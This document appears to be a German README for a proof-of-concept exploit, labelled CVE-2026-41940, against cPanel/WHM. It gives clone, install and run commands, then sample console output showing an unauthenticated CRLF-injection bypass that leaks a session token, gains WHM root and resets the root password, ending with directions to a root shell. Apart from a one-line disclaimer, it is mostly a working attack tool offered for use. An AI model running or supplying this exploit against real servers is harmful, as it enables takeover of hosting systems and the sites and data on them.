
Proof-of-Concept-Exploit für CVE-2026-41940, eine nicht authentifizierte Authentifizierungsumgehung in cPanel/WHM mittels CRLF-Injection, um Sicherheitstokens preiszugeben und das Root-Passwort zurückzusetzen.
CVE-2026-41940 ist ein Proof-of-Concept (PoC)-Exploit, der auf cPanel/WHM abzielt.
Dieser Exploit demonstriert eine unauthentifizierte Authentifizierungsumgehung mithilfe von CRLF-Injection, um Sicherheitstokens zu leaken und Root-Zugriff auf die WHM-Oberfläche zu erlangen, wodurch Aktionen wie das Ändern des Root-Passworts ermöglicht werden.
Haftungsausschluss: Dieses PoC dient nur zu Bildungszwecken. Verwenden Sie es nicht auf Systemen ohne Erlaubnis.
cp_security_token zu leaken.requests-Bibliothek.git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
pip install requests
Anforderungen:
requests,urllib3
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEUES_PASSWORT>
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
Die Konsole zeigt:
[0-4][+][!][*]Beispiel:
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
| Flag | Beschreibung | Erforderlich | Standard |
|---|
--target | WHM-Ziel-URL (z. B. https://host:2087) | Ja | - |
--password | Neues Passwort für den Root-Benutzer | Ja | - |
--hostname | Host:-Header überschreiben | Nein | Auto |